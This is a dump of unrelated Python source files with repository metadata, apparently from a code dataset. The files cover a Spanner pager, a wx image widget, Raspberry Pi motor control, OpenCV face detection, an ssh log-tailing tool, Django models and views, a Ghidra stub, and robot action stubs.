    continuation token is present.  Attribute access is delegated to the
    most recently fetched response.
    """

    def __init__(self,
            method: Callable[..., Awaitable[backup.ListBackupOperationsResponse]],
            request: backup.ListBackupOperationsRequest,
            response: backup.ListBackupOperationsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The awaitable API method originally called,
                re-invoked to fetch subsequent pages.
            request (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsRequest):
                The initial request object.
            response (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse):
                The first page of results.
            metadata (Sequence[Tuple[str, str]]): Strings sent along with
                every follow-up request as metadata.
        """
        self._method = method
        self._request = backup.ListBackupOperationsRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Anything not defined on the pager is looked up on the latest page.
        return getattr(self._response, name)

    @property
    async def pages(self) -> AsyncIterable[backup.ListBackupOperationsResponse]:
        # Emit the page we already hold, then keep fetching for as long as
        # the service reports a continuation token.
        page = self._response
        yield page
        while page.next_page_token:
            self._request.page_token = page.next_page_token
            page = await self._method(self._request, metadata=self._metadata)
            self._response = page
            yield page

    def __aiter__(self) -> AsyncIterable[operations.Operation]:
        async def _flatten():
            async for page in self.pages:
                for item in page.operations:
                    yield item
        return _flatten()

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
d8b1f7b564f9c8a9889d070590faa58b2928a4d8 | c6d22cf128819af1d48d02972bb9296a1687b9bb | /venv/Lib/site-packages/pyface/ui/wx/image_widget.py | 2e50ff64cb90378c94caab22abc79b27e902d0f7 | [
"BSD-3-Clause"
] | permissive | GenomePhD/Bio1-HIV | 92808a1e7e6339da6d07190ba3e1a2071f3e8428 | b5059e7f121e4abb6888893f91f95dd79aed9ca4 | refs/heads/master | 2022-10-28T21:55:42.998205 | 2018-04-16T18:52:32 | 2018-04-16T18:52:32 | 129,792,081 | 0 | 1 | null | 2022-10-05T18:36:22 | 2018-04-16T19:03:26 | Python | UTF-8 | Python | false | false | 7,447 | py | #------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" A clickable/draggable widget containing an image. """
# Major package imports.
import wx
# Enthought library imports.
from traits.api import Any, Bool, Event
# Local imports.
from .widget import Widget
class ImageWidget(Widget):
    """ A clickable/draggable widget containing an image.

    The wx control is created in __init__ and stored on ``self.control``;
    mouse and paint events on that control are handled here to draw
    hover/selection borders around the bitmap.
    """

    #### 'ImageWidget' interface ##############################################

    # The bitmap.
    bitmap = Any

    # Is the widget selected?
    selected = Bool(False)

    #### Events ####

    # A key was pressed while the tree is in focus.
    key_pressed = Event

    # A node has been activated (ie. double-clicked).
    node_activated = Event

    # A drag operation was started on a node.
    node_begin_drag = Event

    # A (non-leaf) node has been collapsed.
    node_collapsed = Event

    # A (non-leaf) node has been expanded.
    node_expanded = Event

    # A left-click occurred on a node.
    node_left_clicked = Event

    # A right-click occurred on a node.
    node_right_clicked = Event

    #### Private interface ####################################################

    # Internal selection state; compared against None and -1 below.
    # NOTE(review): both 'selected' (Bool trait) and '_selected' exist but are
    # never synchronised with each other -- confirm which one is canonical.
    _selected = Any

    ###########################################################################
    # 'object' interface.
    ###########################################################################

    def __init__ (self, parent, **traits):
        """ Creates a new widget.

        parent: the wx parent window for the control.
        **traits: initial trait values (must include 'bitmap', which is read
            here to size the control).
        """

        # Base class constructors.
        super(ImageWidget, self).__init__(**traits)

        # Add some padding around the image.
        size = (self.bitmap.GetWidth() + 10, self.bitmap.GetHeight() + 10)

        # Create the toolkit-specific control.
        self.control = wx.Window(parent, -1, size=size)
        # Marker attribute used by _selected_changed to recognise sibling
        # ImageWidget controls.
        self.control.__tag__ = 'hack'

        # Hover / pressed state used by the paint handler.
        self._mouse_over = False
        self._button_down = False

        # Set up mouse event handlers:
        self.control.Bind(wx.EVT_ENTER_WINDOW, self._on_enter_window)
        self.control.Bind(wx.EVT_LEAVE_WINDOW, self._on_leave_window)
        self.control.Bind(wx.EVT_LEFT_DCLICK, self._on_left_dclick)
        self.control.Bind(wx.EVT_LEFT_DOWN, self._on_left_down)
        self.control.Bind(wx.EVT_LEFT_UP, self._on_left_up)
        self.control.Bind(wx.EVT_PAINT, self._on_paint)

        # Pens used to draw the 'selection' marker:
        # ZZZ: Make these class instances when moved to the wx toolkit code.
        self._selectedPenDark = wx.Pen(
            wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DSHADOW), 1,
            wx.PENSTYLE_SOLID
        )
        self._selectedPenLight = wx.Pen(
            wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DHIGHLIGHT), 1,
            wx.PENSTYLE_SOLID
        )
        return

    ###########################################################################
    # Private interface.
    ###########################################################################

    #### Trait event handlers #################################################

    def _bitmap_changed(self, bitmap):
        """ Called when the widget's bitmap is changed. """

        # Repaint so the new bitmap becomes visible.
        if self.control is not None:
            self.control.Refresh()
        return

    def _selected_changed(self, selected):
        """ Called when the selected state of the widget is changed.

        Deselects any previously-selected sibling (identified by the
        '__tag__' marker) so that at most one widget is selected.
        """
        if selected:
            # NOTE(review): GetParent/GetChildren/Refresh and Selected() are
            # called on 'self'/'control', i.e. on the traits Widget and on raw
            # wx.Window objects, neither of which defines Selected(); these
            # look like they should go through self.control / an ImageWidget
            # wrapper -- confirm before relying on this handler.
            for control in self.GetParent().GetChildren():
                if hasattr(control, '__tag__'):
                    if control.Selected():
                        control.Selected(False)
                        break
            self.Refresh()
        return

    #### wx event handlers ####################################################

    def _on_enter_window(self, event):
        """ Called when the mouse enters the widget. """

        # Only show hover feedback when the widget is selectable.
        if self._selected is not None:
            self._mouse_over = True
            self.Refresh()
        return

    def _on_leave_window(self, event):
        """ Called when the mouse leaves the widget. """

        if self._mouse_over:
            self._mouse_over = False
            self.Refresh()
        return

    def _on_left_dclick(self, event):
        """ Called when the left mouse button is double-clicked. """

        #print 'left dclick'
        event.Skip()
        return

    def _on_left_down ( self, event = None ):
        """ Called when the left mouse button goes down on the widget. """

        #print 'left down'
        if self._selected is not None:
            # Capture the mouse so the matching left-up is delivered to us
            # even if the pointer leaves the widget.
            self.CaptureMouse()
            self._button_down = True
            self.Refresh()
        event.Skip()
        return

    def _on_left_up ( self, event = None ):
        """ Called when the left mouse button goes up on the widget.

        Selects the widget if the release happened inside its client area.
        """

        #print 'left up'
        need_refresh = self._button_down
        if need_refresh:
            self.ReleaseMouse()
            self._button_down = False

        if self._selected is not None:
            # NOTE(review): GetClientSizeTuple() is removed in wxPython
            # Phoenix (use GetClientSize()); Selected() is not defined on
            # this class -- confirm against the wx/traits versions in use.
            wdx, wdy = self.GetClientSizeTuple()
            x = event.GetX()
            y = event.GetY()
            # Only treat the click as a selection if released inside us.
            if (0 <= x < wdx) and (0 <= y < wdy):
                if self._selected != -1:
                    self.Selected( True )
            elif need_refresh:
                self.Refresh()
            return

        if need_refresh:
            self.Refresh()
        event.Skip()
        return

    def _on_paint ( self, event = None ):
        """ Called when the widget needs repainting.

        Draws the bitmap centred in the client area, a one-pixel hover
        border when the mouse is over the widget, and a two-pixel
        'selected' border when selected.  Light/dark pen order flips while
        the button is pressed to give a pushed-in look.
        """

        wdc = wx.PaintDC( self.control )
        wdx, wdy = self.control.GetClientSizeTuple()
        bitmap = self.bitmap
        bdx = bitmap.GetWidth()
        bdy = bitmap.GetHeight()
        # Centre the bitmap; True enables the transparency mask.
        wdc.DrawBitmap( bitmap, (wdx - bdx) / 2, (wdy - bdy) / 2, True )

        # bd is a bool used as a 0/1 index: pressed state swaps the pens.
        pens = [ self._selectedPenLight, self._selectedPenDark ]
        bd = self._button_down
        if self._mouse_over:
            wdc.SetBrush( wx.TRANSPARENT_BRUSH )
            wdc.SetPen( pens[ bd ] )
            wdc.DrawLine( 0, 0, wdx, 0 )
            wdc.DrawLine( 0, 1, 0, wdy )
            wdc.SetPen( pens[ 1 - bd ] )
            wdc.DrawLine( wdx - 1, 1, wdx - 1, wdy )
            wdc.DrawLine( 1, wdy - 1, wdx - 1, wdy - 1 )

        if self._selected == True:
            wdc.SetBrush( wx.TRANSPARENT_BRUSH )
            wdc.SetPen( pens[ bd ] )
            wdc.DrawLine( 1, 1, wdx - 1, 1 )
            wdc.DrawLine( 1, 1, 1, wdy - 1 )
            wdc.DrawLine( 2, 2, wdx - 2, 2 )
            wdc.DrawLine( 2, 2, 2, wdy - 2 )
            wdc.SetPen( pens[ 1 - bd ] )
            wdc.DrawLine( wdx - 2, 2, wdx - 2, wdy - 1 )
            wdc.DrawLine( 2, wdy - 2, wdx - 2, wdy - 2 )
            wdc.DrawLine( wdx - 3, 3, wdx - 3, wdy - 2 )
            wdc.DrawLine( 3, wdy - 3, wdx - 3, wdy - 3 )
        return
#### EOF ######################################################################
| [
"stevetmat@users.noreply.github.com"
] | stevetmat@users.noreply.github.com |
ccbee1958de03e05a060ef308bfd12c5bb39aad3 | 3406282d9a3744b4fb7d522f468b79d8b9d2c353 | /code/basic.py | 81db51385aa4e9f3d9fac286aef50c03053343d1 | [
"MIT"
] | permissive | swy20190/AmazingCar | cfdc8ccd0530a86a8462503ef0ecabdefbe29243 | 50d429e281d0986e44cf767fe7c0db2c7acc136d | refs/heads/master | 2022-09-19T07:15:59.097923 | 2020-06-03T14:01:11 | 2020-06-03T14:01:11 | 265,777,170 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,969 | py | # this file contains basic functions of the car
import RPi.GPIO as GPIO
import time
# BCM pin numbers for the dual motor driver (the AIN/BIN/PWM naming suggests a
# TB6612-style dual H-bridge -- confirm against the wiring).
# Motor A (left): speed (PWM) pin plus two direction inputs.
PWMA = 18
AIN1 = 22
AIN2 = 27
# Motor B (right): speed (PWM) pin plus two direction inputs.
PWMB = 23
BIN1 = 25
BIN2 = 24
def init():
    """Configure every motor-driver pin (BCM numbering) as a GPIO output.

    Must be called before creating the GPIO.PWM channels in ``__main__``.

    Bug fix: the original set up PWMB twice and never set up PWMA, so
    ``GPIO.PWM(PWMA, 100)`` in ``__main__`` would fail with
    "You must setup() the GPIO channel first".
    """
    GPIO.setwarnings(False)
    GPIO.setmode(GPIO.BCM)
    # Both motors: PWM (speed) pin and the two direction inputs.
    for pin in (PWMA, AIN1, AIN2, PWMB, BIN1, BIN2):
        GPIO.setup(pin, GPIO.OUT)
def forward(speed, duration, l_m, r_m):
    """Drive both wheels forward, then block for ``duration`` seconds.

    speed: PWM duty cycle (0-100) applied to both motors.
    l_m, r_m: GPIO.PWM objects for the left and right motors.
    """
    def _spin_forward(motor, in2, in1):
        motor.ChangeDutyCycle(speed)
        GPIO.output(in2, False)
        GPIO.output(in1, True)

    _spin_forward(l_m, AIN2, AIN1)
    _spin_forward(r_m, BIN2, BIN1)
    time.sleep(duration)
def backward(speed, duration, l_m, r_m):
    """Drive both wheels in reverse, then block for ``duration`` seconds.

    speed: PWM duty cycle (0-100) applied to both motors.
    l_m, r_m: GPIO.PWM objects for the left and right motors.
    """
    def _spin_backward(motor, in2, in1):
        motor.ChangeDutyCycle(speed)
        GPIO.output(in2, True)
        GPIO.output(in1, False)

    _spin_backward(l_m, AIN2, AIN1)
    _spin_backward(r_m, BIN2, BIN1)
    time.sleep(duration)
def brake(duration, l_m, r_m):
    """Stop both motors (0% duty, both direction inputs low) and wait.

    duration: seconds to block after stopping.
    l_m, r_m: GPIO.PWM objects for the left and right motors.
    """
    def _stop(motor, in2, in1):
        motor.ChangeDutyCycle(0)
        GPIO.output(in2, False)
        GPIO.output(in1, False)

    _stop(l_m, AIN2, AIN1)
    _stop(r_m, BIN2, BIN1)
    time.sleep(duration)
# Differential steering.
def turn(l_speed, r_speed, duration, l_m, r_m):
    """Steer by driving each wheel forward at its own PWM duty cycle.

    l_speed, r_speed: duty cycles (0-100) for the left and right motors.
    duration: seconds to block while turning.
    l_m, r_m: GPIO.PWM objects for the left and right motors.
    """
    def _drive(motor, in2, in1, duty):
        motor.ChangeDutyCycle(duty)
        GPIO.output(in2, False)
        GPIO.output(in1, True)

    _drive(l_m, AIN2, AIN1, l_speed)
    _drive(r_m, BIN2, BIN1, r_speed)
    time.sleep(duration)
# Turn along an arc with a one-metre radius.
def advanced_turn(direction, duration, l_m, r_m):
    """Turn on a ~1 m radius by running the outer wheel faster.

    direction: 0 turns left, any other value turns right.
    duration: seconds to block while turning.
    l_m, r_m: GPIO.PWM objects for the left and right motors.
    """
    # Duty cycles for the outer (faster) and inner (slower) wheels.
    outer_speed = 94.102
    inner_speed = 80.0
    if direction == 0:
        left, right = inner_speed, outer_speed
    else:
        left, right = outer_speed, inner_speed
    turn(l_speed=left, r_speed=right, duration=duration, l_m=l_m, r_m=r_m)
if __name__ == '__main__':
    # Configure all driver pins, then create one 100 Hz PWM channel per
    # motor, both started at 0% duty (stopped).
    init()
    L_Motor = GPIO.PWM(PWMA, 100)
    L_Motor.start(0)
    R_Motor = GPIO.PWM(PWMB, 100)
    R_Motor.start(0)
| [
"K201410109@163.com"
] | K201410109@163.com |
e372cbab3599b8a62170b6d118f9645cf650296f | ae33f5e297eec9a7550f9040e4ae79e0049f5d71 | /haar/facerec.py | c94e6cce9ad3cd32261a7fe3c31a7b27c1c4f913 | [] | no_license | tano297/facerec | 5d52a7681be371ab148e70892726a9589e785ff4 | 7677cf8819e47d93ece334b93602fef227984990 | refs/heads/master | 2021-01-25T06:46:08.208538 | 2017-06-26T14:47:11 | 2017-06-26T14:47:11 | 93,614,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,184 | py | #!/usr/bin/python
import numpy as np
import cv2
# Open the default camera (device index 0).
cap = cv2.VideoCapture(0)

# Pretrained Haar cascade classifiers; the XML files are loaded from the
# current working directory.
# NOTE(review): CascadeClassifier() does not raise if a file is missing --
# detection would silently fail later; consider checking .empty().
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')

while(cap.isOpened()):
    # Capture frame-by-frame.
    ret, frame = cap.read()
    if not ret:
        print("No video! Exiting...")
        exit()

    # Haar cascades operate on grayscale images.
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

    # Search for faces' bounding boxes
    # (scale factor 1.3, minimum 5 neighbours per detection).
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)

    # For each face, draw its rectangle and search for eyes inside it.
    for (x,y,w,h) in faces:
        # Rectangle around the face (blue, 2px).
        cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
        # ROI slices are numpy views, so drawing on roi_color also draws
        # on 'frame'.
        roi_gray = gray[y:y+h, x:x+w]
        roi_color = frame[y:y+h, x:x+w]
        eyes = eye_cascade.detectMultiScale(roi_gray)
        for (ex,ey,ew,eh) in eyes:
            # Rectangle around each eye (green, 2px), in face coordinates.
            cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)

    # Display the resulting frame; 'q' quits.
    cv2.imshow('frame',frame)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

# When everything is done, release the capture and close the window.
cap.release()
cv2.destroyAllWindows()
"tano.297@gmail.com"
] | tano.297@gmail.com |
cc47947af7cebae7fdc2b5543d4508a2c820c757 | cf74a48db45d0fa8c9ae58931a9368672d07fa19 | /utils/zgrep.py | b587690671719faa84d712598846558189a92885 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | razikallayi/NewsBlur | fdb7549d73dfd6765e2cf2e4007f1b9cfb39002f | a266d9f585400c506fa9727796a5dddba0e69ffb | refs/heads/master | 2021-01-18T08:12:02.738442 | 2015-05-27T00:58:45 | 2015-05-27T00:58:45 | 36,501,810 | 1 | 0 | null | 2015-05-29T12:01:58 | 2015-05-29T12:01:56 | null | UTF-8 | Python | false | false | 3,581 | py | #!/usr/bin/env python
import os
import time
import select
import subprocess
import sys
from optparse import OptionParser
from requests.exceptions import ConnectionError
sys.path.insert(0, '/srv/newsblur')
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import fabfile
# Remote login used when ssh-ing into non-EC2 hosts.
NEWSBLUR_USERNAME = 'sclay'

# Hostname substrings to skip when building log streams.
IGNORE_HOSTS = [
    'push',
]
def main(role="app", role2="work", command=None, path=None):
    """Stream (tail/grep) logs from every host in two fabfile roles, forever.

    Reconnects after decode errors and connection failures (with a
    linearly growing back-off) until interrupted with Ctrl-C.

    NOTE: this module uses Python 2 print statements; it must be run under
    Python 2.
    """
    delay = 1
    while True:
        try:
            streams = create_streams_for_roles(role, role2, command=command, path=path)
            print " --- Loading %s App Log Tails ---" % len(streams)
            read_streams(streams)
        except UnicodeDecodeError: # unexpected end of data
            # Treated as a dropped connection: retry quickly.
            print " --- Lost connections - Retrying... ---"
            time.sleep(1)
            continue
        except ConnectionError:
            # Back off one second longer after each consecutive failure.
            print " --- Retrying in %s seconds... ---" % delay
            time.sleep(delay)
            delay += 1
            continue
        except KeyboardInterrupt:
            print " --- End of Logging ---"
            break
def create_streams_for_roles(role, role2, command=None, path=None):
    """Spawn one ssh subprocess per unique host in the two fabfile roles.

    Each subprocess runs ``command path`` (default: ``tail -f`` on the
    NewsBlur log) on the remote host; its stdout is a pipe read later by
    read_streams().  Returns the list of Popen objects, each annotated
    with a ``name`` attribute holding the short hostname.
    """
    streams = list()
    hosts = fabfile.do(split=True)
    found = set()
    if not path:
        path = "/srv/newsblur/logs/newsblur.log"
    if not command:
        command = "tail -f"
    for hostname in (hosts[role] + hosts[role2]):
        # Host entries come in several shapes from fabfile.do():
        # dict {'name':..., 'address':...}, "name:address" string,
        # (name, address) tuple, or a bare hostname string.
        # NOTE(review): the tuple branch is unreachable for tuples whose
        # elements contain ':' (the "':' in hostname" membership test on a
        # tuple fires first) -- confirm the actual shapes fabfile returns.
        if isinstance(hostname, dict):
            address = hostname['address']
            hostname = hostname['name']
        elif ':' in hostname:
            hostname, address = hostname.split(':', 1)
        elif isinstance(hostname, tuple):
            hostname, address = hostname[0], hostname[1]
        else:
            address = hostname
        # Skip ignored hosts and de-duplicate by hostname.
        if any(h in hostname for h in IGNORE_HOSTS): continue
        if hostname in found: continue
        # EC2 hosts use the ec2 key and the default user; other hosts use
        # the NewsBlur key and NEWSBLUR_USERNAME.
        if 'ec2' in hostname:
            s = subprocess.Popen(["ssh",
                                  "-i", os.path.expanduser(os.path.join(fabfile.env.SECRETS_PATH,
                                                                        "keys/ec2.pem")),
                                  address, "%s %s" % (command, path)], stdout=subprocess.PIPE)
        else:
            s = subprocess.Popen(["ssh", "-l", NEWSBLUR_USERNAME,
                                  "-i", os.path.expanduser(os.path.join(fabfile.env.SECRETS_PATH,
                                                                        "keys/newsblur.key")),
                                  address, "%s %s" % (command, path)], stdout=subprocess.PIPE)
        # Short name shown in the log prefix by read_streams().
        s.name = hostname
        streams.append(s)
        found.add(hostname)
    return streams
def read_streams(streams):
    """Multiplex output from several subprocess stdout pipes onto stdout.

    Each chunk is prefixed with the first six characters of the owning
    stream's ``name``.  A stream that reaches EOF is removed from
    ``streams`` (the list is mutated in place).

    Returns once every stream has reached EOF.

    Bug fix: the original looped ``while True``, so after the last stream
    was removed it called select.select([], [], []) and blocked forever
    instead of returning to the caller's reconnect loop.
    """
    while streams:
        r, _, _ = select.select(
            [stream.stdout.fileno() for stream in streams], [], [])
        for fileno in r:
            for stream in streams:
                if stream.stdout.fileno() != fileno:
                    continue
                data = os.read(fileno, 4096)
                if not data:
                    # EOF on this pipe: drop the finished stream.
                    streams.remove(stream)
                    break
                combination_message = "[%-6s] %s" % (stream.name[:6], data)
                sys.stdout.write(combination_message)
                break
if __name__ == "__main__":
    # -f/--find: pattern handed to zgrep on each host;
    # -p/--path: remote log path (defaults inside create_streams_for_roles).
    parser = OptionParser()
    parser.add_option("-f", "--find", dest="find")
    parser.add_option("-p", "--path", dest="path")
    (options, args) = parser.parse_args()
    path = options.path
    find = options.find
    # NOTE(review): 'find' is interpolated unescaped into a remote shell
    # command line -- shell metacharacters in the pattern will be executed
    # on the remote hosts.
    command = "zgrep \"%s\"" % find
    main(role="app", role2="dev", command=command, path=path)
| [
"samuel@ofbrooklyn.com"
] | samuel@ofbrooklyn.com |
537dd076c49ad2ccafc435e3f66ed76126ba6de6 | b1ddcf4bac9ca603a7a2333912eb29da8bf2cb7b | /modelViewset/api/views.py | 7a9e893c1dd960e695c5c68e31de55adba80160d | [] | no_license | sankethalake/django_practice | e9477ae0beee4923cd6758cc6d37517ea5979610 | 9877304f0c6415ae8979e5cc13a49559155fdd9d | refs/heads/main | 2023-07-07T07:07:35.598657 | 2021-08-14T06:26:23 | 2021-08-14T06:26:23 | 389,917,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | from .models import Student
from .serializers import StudentSerializer
from rest_framework import viewsets
class StudentModelViewset(viewsets.ModelViewSet):
    """CRUD API endpoints for Student records.

    ModelViewSet wires up list/retrieve/create/update/destroy actions from
    the serializer and queryset declared below.
    """

    serializer_class = StudentSerializer
    queryset = Student.objects.all()
| [
"sankethalake@gmail.com"
] | sankethalake@gmail.com |
4069cf696c9532eef3b0edf6220845339f5f76ec | 786027545626c24486753351d6e19093b261cd7d | /ghidra9.2.1_pyi/ghidra/app/util/bin/format/dwarf4/next/DWARFRegisterMappingsManager.pyi | ba1a1bbc88343e1b810e395de5dbfa5da91fb33f | [
"MIT"
] | permissive | kohnakagawa/ghidra_scripts | 51cede1874ef2b1fed901b802316449b4bf25661 | 5afed1234a7266c0624ec445133280993077c376 | refs/heads/main | 2023-03-25T08:25:16.842142 | 2021-03-18T13:31:40 | 2021-03-18T13:31:40 | 338,577,905 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,592 | pyi | import generic.jar
import ghidra.app.util.bin.format.dwarf4.next
import ghidra.program.model.lang
import java.lang
import org.jdom
# NOTE(review): auto-generated Jython type stub (.pyi) for Ghidra's Java API.
# 'unicode' and 'long' below are Python-2/Jython builtin names, and '@overload'
# is used without a visible import -- both are normal for these generated stubs
# and should not be "fixed" by hand.
class DWARFRegisterMappingsManager(object):
    """
    Factory class to instantiate and cache DWARFRegisterMappings objects.
    """
    def __init__(self): ...
    def equals(self, __a0: object) -> bool: ...
    def getClass(self) -> java.lang.Class: ...
    @staticmethod
    def getDWARFRegisterMappingFileFor(lang: ghidra.program.model.lang.Language) -> generic.jar.ResourceFile:
        """
        Returns {@link ResourceFile} that should contain the specified language's
        DWARF register mapping, never null.
        @param lang {@link Language} to find the mapping file for.
        @return {@link ResourceFile} of where the mapping file should be, never
        null.
        @throws IOException if not a Sleigh language or no mapping specified or
        multiple mappings specified.
        """
        ...
    @staticmethod
    def getMappingForLang(lang: ghidra.program.model.lang.Language) -> ghidra.app.util.bin.format.dwarf4.next.DWARFRegisterMappings:
        """
        Returns a possibly cached {@link DWARFRegisterMappings} object for the
        specified language,
        <p>
        @param lang {@link Language} to get the matching DWARF register mappings
        for
        @return {@link DWARFRegisterMappings} instance, never null
        @throws IOException if mapping not found or invalid
        """
        ...
    @overload
    @staticmethod
    def hasDWARFRegisterMapping(lang: ghidra.program.model.lang.Language) -> bool:
        """
        Returns true if the specified {@link Language} has DWARF register
        mappings.
        @param lang The {@link Language} to test
        @return true if the language has a DWARF register mapping specified
        @throws IOException if there was an error in the language LDEF file.
        """
        ...
    @overload
    @staticmethod
    def hasDWARFRegisterMapping(langDesc: ghidra.program.model.lang.LanguageDescription) -> bool:
        """
        Returns true if the specified {@link LanguageDescription} has DWARF
        register mappings.
        @param langDesc The {@link LanguageDescription} to test
        @return true if the language has a DWARF register mapping specified
        @throws IOException if there was an error in the language LDEF file.
        """
        ...
    def hashCode(self) -> int: ...
    def notify(self) -> None: ...
    def notifyAll(self) -> None: ...
    @staticmethod
    def readMappingForLang(lang: ghidra.program.model.lang.Language) -> ghidra.app.util.bin.format.dwarf4.next.DWARFRegisterMappings:
        """
        Finds the DWARF register mapping information file specified in the
        specified language's LDEF file and returns a new
        {@link DWARFRegisterMappings} object containing the data read from that
        file.
        <p>
        Throws {@link IOException} if the lang does not have a mapping or it is
        invalid.
        <p>
        @param lang {@link Language} to read the matching DWARF register mappings
        for
        @return a new {@link DWARFRegisterMappings} instance, created from
        information read from the {@link #DWARF_REGISTER_MAPPING_NAME}
        xml file referenced in the language's LDEF, never null.
        @throws IOException if there is no DWARF register mapping file associated
        with the specified {@link Language} or if there was an error
        in the register mapping data.
        """
        ...
    @staticmethod
    def readMappingFrom(rootElem: org.jdom.Element, lang: ghidra.program.model.lang.Language) -> ghidra.app.util.bin.format.dwarf4.next.DWARFRegisterMappings:
        """
        Creates a new {@link DWARFRegisterMappings} from the data present in the
        xml element.
        <p>
        @param rootElem JDom XML element containing the <dwarf> root
        element of the mapping file.
        @param lang The Ghidra {@link Language} that the DWARF register mapping
        applies to
        @return a new {@link DWARFRegisterMappings} instance, never null.
        @throws IOException if missing or invalid data found in xml
        """
        ...
    def toString(self) -> unicode: ...
    @overload
    def wait(self) -> None: ...
    @overload
    def wait(self, __a0: long) -> None: ...
    @overload
    def wait(self, __a0: long, __a1: int) -> None: ...
| [
"tsunekou1019@gmail.com"
] | tsunekou1019@gmail.com |
e2328cbb036a2a53d77b6c6cc430606a33cc18a4 | c9a4e88111d05cf9db399eba3ae83ddb3b0ad2da | /myapp/models.py | 801590a2819433ea0630630a9b407a91b5cbd1d0 | [] | no_license | Django-TOPS/07JanPython | 7861d9a515e9da951b14f8caa5b1bb0578d99557 | b101e7b2b457250153aedb6a95354e10824ecec5 | refs/heads/master | 2023-04-12T17:08:44.644228 | 2021-05-20T03:30:10 | 2021-05-20T03:30:10 | 369,140,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | from django.db import models
# Create your models here.
class signup(models.Model):
    """Registration record for a site user (name, login and address data)."""
    # NOTE(review): the password is stored as a plain CharField -- use Django's
    # auth framework / password hashing before real use.  The lowercase class
    # name also breaks the PascalCase model convention, but renaming it now
    # would require a migration, so it is left as-is here.
    firstname=models.CharField(max_length=20)
    lastname=models.CharField(max_length=20)
    username=models.EmailField()
    password=models.CharField(max_length=20)
    city=models.CharField(max_length=20)
    state=models.CharField(max_length=20)
    zipcode=models.IntegerField()
class notes(models.Model):
    """An uploaded note: a categorised file with a title and free-form comments."""
    title=models.CharField(max_length=100)
    category=models.CharField(max_length=100)
    # Uploaded files land in MEDIA_ROOT/FileUpload/.
    myfiles=models.FileField(upload_to="FileUpload")
    comments=models.TextField()
| [
"sanketiosonline@gmail.com"
] | sanketiosonline@gmail.com |
dd23f81f0523a7ea828de9f8aa5f5cc5ce00d2d7 | c9952dcac5658940508ddc139344a7243a591c87 | /tests/lab18/test_ch018_t01_why_use_classes.py | 89a74ccf8952816be596452943f8010beaf6bc90 | [] | no_license | wongcyrus/ite3101_introduction_to_programming | 5da1c15212528423b3df91997327fe148abef4de | 7cd76d0861d5355db5a6e2e171735bee2e78f829 | refs/heads/master | 2023-08-31T17:27:06.193049 | 2023-08-21T08:30:26 | 2023-08-21T08:30:26 | 136,574,036 | 3 | 2 | null | 2023-08-21T08:30:28 | 2018-06-08T06:06:49 | Python | UTF-8 | Python | false | false | 1,037 | py | import unittest
from tests.unit_test_helper import is_answer
class TestOutput(unittest.TestCase):
def setUp(self):
if is_answer:
from lab.lab18.ch018_t01_why_use_classes_ans import Fruit
else:
from lab.lab18.ch018_t01_why_use_classes import Fruit
self.fruit = Fruit("lemon", "yellow", "sour", False)
def test_member(self):
self.assertEqual("lemon", self.fruit.name)
self.assertEqual("yellow", self.fruit.color)
self.assertEqual("sour", self.fruit.flavor)
self.assertFalse(self.fruit.poisonous)
def test_create_instance(self):
if is_answer:
from lab.lab18.ch018_t01_why_use_classes_ans import lemon
else:
from lab.lab18.ch018_t01_why_use_classes import lemon
self.assertEqual("lemon", lemon.name)
self.assertEqual("yellow", lemon.color)
self.assertEqual("sour", lemon.flavor)
self.assertFalse(lemon.poisonous)
if __name__ == '__main__':
    # Allow running this test module directly (outside a test runner).
    unittest.main()
| [
"cywong@vtc.edu.hk"
] | cywong@vtc.edu.hk |
l1 = [1, 2, 3]
# Cube each element.  The original wrapped ``map`` in a generator expression
# and printed the generator object itself (``<generator object ...>``) without
# ever consuming it; materialise it so the cubes are actually printed.
cubes = [a ** 3 for a in l1]
print(cubes)
| [
"noreply@github.com"
] | noreply@github.com |
f10aa9ff13f33cbd99be9c6822f4393cb170c568 | 401a03896f05313cc06297760aedfc44499d60e7 | /scripts/test_actions.py | 08bf91ee1bd4fd11cf996bdfd2036d7627993074 | [] | no_license | ccapontep/HumanRobotInteraction_ER | 6d4d3b4440532c1774d964ca4deddb3086083f9e | b74c225cd4700566d3a2aca00b8861ddacddec56 | refs/heads/master | 2020-06-28T00:12:16.524309 | 2019-09-16T14:05:15 | 2019-09-16T14:05:15 | 200,089,230 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | import os, sys
pdir = os.getenv('PNP_HOME')
sys.path.insert(0, pdir+'/PNPnaoqi/actions/')
import action_base
from action_base import *
pdir = os.getenv('PEPPER_TOOLS_HOME')
sys.path.append(pdir+ '/cmd_server')
import pepper_cmd
from pepper_cmd import *
# Python 2 module (bare ``print`` statements below) -- keep py2-compatible.
class SayAction(NAOqiAction_Base):
    # PNP action that makes the Pepper robot speak the given parameter string.
